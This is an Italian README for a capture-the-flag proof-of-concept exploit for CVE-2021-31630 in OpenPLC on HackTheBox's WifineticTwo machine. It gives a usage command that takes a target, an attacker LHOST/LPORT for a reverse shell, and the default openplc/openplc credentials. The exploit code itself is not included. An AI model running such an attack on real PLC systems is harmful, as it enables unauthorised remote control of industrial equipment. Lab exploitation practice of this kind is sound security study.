
Un semplice script Python per sfruttare CVE-2021-31630 su HTB WifineticTwo CTF
Questo script Python è un exploit Proof of Concept (PoC) per la CVE-2021-31630, che mira a una vulnerabilità in OpenPLC in esecuzione sulla macchina WifineticTwo di HackTheBox. È progettato esclusivamente per scopi educativi e mira a dimostrare il processo di sfruttamento in un ambiente controllato.
Questo strumento è destinato esclusivamente alla ricerca sulla sicurezza e a scopi educativi. L'utilizzo di questo strumento per attaccare obiettivi senza il preventivo consenso reciproco è illegale. Lo sviluppatore non sarà ritenuto responsabile per eventuali danni o accuse penali a carico degli utenti che fanno un uso improprio di questo exploit.
Prima di eseguire questo exploit, assicurati di avere:
requests installata. Puoi installarla usando pip install requests.Per utilizzare questo exploit, devi specificare l'URL del target, l'IP dell'host locale (LHOST) e la porta locale (LPORT) a cui la reverse shell deve connettersi. Facoltativamente, puoi specificare nome utente e password per OpenPLC se differiscono da quelli predefiniti.
./exploit.py --target http://wifinetictwo.htb:8080 --lhost [LHOST] --lport [LPORT] [--usr [USERNAME] --pwd [PASSWORD]]
--target - Indirizzo di base del target. Esempio: http://wifinetictwo.htb:8080--lhost - Indirizzo IP dell'host locale a cui la reverse shell deve connettersi.--lport - Porta locale a cui la reverse shell deve connettersi.--usr - (Opzionale) Nome utente per OpenPLC. Il valore predefinito è openplc.--pwd - (Opzionale) Password per OpenPLC. Il valore predefinito è openplc.